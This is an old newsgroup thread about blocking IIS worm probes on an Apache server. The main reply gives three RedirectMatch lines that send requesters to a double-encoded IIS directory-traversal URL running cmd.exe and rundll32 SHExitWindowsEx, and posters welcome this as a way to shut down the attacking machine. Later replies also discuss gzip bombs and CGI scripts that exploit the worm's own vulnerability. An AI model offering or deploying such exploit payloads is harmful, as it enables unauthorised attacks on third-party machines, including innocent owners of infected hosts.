url rewrite question

Anthony Argyriou wrote:
 > Problem: People who think my server is IIS and trying to get various *.exe
 > and *.dll files in an attempt to compromise the server. The directory path
 > used varies a lot, usually into directories that don't exist on my server.
 >
 > Preferred solution: have all requests ending in *.exe or *.exe?*
 > (similarly for .dll) fetch back a file telling them to go bugger off.
 > (I have some ideas about that - there's a simple file that's supposed to
 > GPF IE, but I'm not sure that the script kiddies are using IE.)

These are likely scripts and/or worms, there's nobody at the other end
watching the page's output. The following should actually shut down the
machine making the request if it is a Windows NT/2K/XP machine. Which
should raise a flag to the admin and therefore try to find out why it is
doing that so they can fix it in the case that it is an infected server.

Try this (note there is only 3 lines here):

RedirectMatch (.*)\default.ida$
<a style='text-decoration: underline;' href="http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201" target="_blank">http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundl....exe+sh</a>

RedirectMatch (.*)\root.exe$
<a style='text-decoration: underline;' href="http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201" target="_blank">http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundl....exe+sh</a>

RedirectMatch (.*)\cmd.exe$
<a style='text-decoration: underline;' href="http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201" target="_blank">http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundl....exe+sh</a>

Put these in the <IfModule mod_alias.c> directive to avoid config errors.

--
Justin Koivisto - spam.TakeThisOut@koivi.com
PHP POSTERS: Please use comp.lang.php for PHP related questions,
alt.php* groups are not recommended.<!-- ~MESSAGE_AFTER~ -->
 >> Stay informed about: url rewrite question 

On Tue, 14 Oct 2003 12:30:14 -0700, Justin Koivisto wrote:

 > These are likely scripts and/or worms, there's nobody at the other end
 > watching the page's output. The following should actually shut down the
 > machine making the request if it is a Windows NT/2K/XP machine. Which
 > should raise a flag to the admin and therefore try to find out why it is
 > doing that so they can fix it in the case that it is an infected server.
 >
 > Try this (note there is only 3 lines here):

Thank you! I'd been contemplating some sort of payload where they got
redirected to a cgi which spit back something gzip encoded which had been
compressed by a factor of several thousand, so I could send them
megabytes of repetitive crap without clogging my uplink much. This seems
like a better idea overall!

Anthony
--
to email me, use my first name for my username, and the username
as my second-level domain name.<!-- ~MESSAGE_AFTER~ -->
 >> Stay informed about: url rewrite question 

 > Thank you! I'd been contemplating some sort of payload where they got
 > redirected to a cgi which spit back something gzip encoded which had been
 > compressed by a factor of several thousand, so I could send them
 > megabytes of repetitive crap without clogging my uplink much. This seems
 > like a better idea overall!

since the worm will not unzip the response, they couldn't care less.
but there have been people redirecting these requests to a cgi which
uses the same vulnerability the worm exploited to close down the
offending system. this may of course get you into trouble but it's
pretty shure to catch somebodies attention - and if it doesn't, well
one wormhole less on the net.

joachim<!-- ~MESSAGE_AFTER~ -->
 >> Stay informed about: url rewrite question